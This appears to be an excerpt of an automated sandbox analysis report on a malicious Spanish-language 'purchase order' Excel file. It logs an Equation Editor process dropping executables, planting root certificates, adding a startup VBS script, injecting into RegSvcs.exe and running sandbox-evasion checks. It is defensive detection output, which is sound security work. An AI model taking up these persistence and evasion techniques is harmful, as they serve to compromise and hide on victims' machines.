                  Source: Binary string: wntdll.pdb source: name.exe, 00000008.00000003.776938516.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.777173422.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.811942051.00000000011D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.813355111.0000000002B70000.00000004.00001000.00020000.00000000.sdmp
                  Source: Orden de compra 0001-00255454.xlam.xlsxInitial sample: OLE indicators vbamacros = False

                  Data Obfuscation

                  barindex
                  Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00B142DE
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029EFE76 push ecx; ret 5_3_029EFE89
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B30A76 push ecx; ret 5_2_00B30A89
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01010A76 push ecx; ret 8_2_01010A89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041C40C push cs; iretd 9_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041C50E push cs; iretd 9_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040E21D push ecx; ret 9_2_0040E230
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041C6BE push ebx; ret 9_2_0041C6BF
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01350A76 push ecx; ret 11_2_01350A89
                  Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                  Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'HvkAfo9TVO8ur', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeFile created: C:\Users\user\AppData\Local\directory\name.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\negrett.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to dropped file
                  Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbsJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0100F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,8_2_0100F98E
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01081C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,8_2_01081C41
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0134F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_0134F98E
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_013C1C41
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\AppData\Roaming\negrett.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_5-46719
                  Source: C:\Users\user\AppData\Local\directory\name.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_8-98652
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,9_2_004019F0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01001199 sldt word ptr [ecx]8_2_01001199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1404Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8402Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8861Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 961Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                  Source: C:\Users\user\AppData\Roaming\negrett.exeAPI coverage: 6.7 %
                  Source: C:\Users\user\AppData\Local\directory\name.exeAPI coverage: 4.5 %
                  Source: C:\Users\user\AppData\Local\directory\name.exeAPI coverage: 4.4 %
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1376Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,5_2_00B7DBBE
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B4C2A2 FindFirstFileExW,5_2_00B4C2A2
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B868EE FindFirstFileW,FindClose,5_2_00B868EE
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,5_2_00B8698F
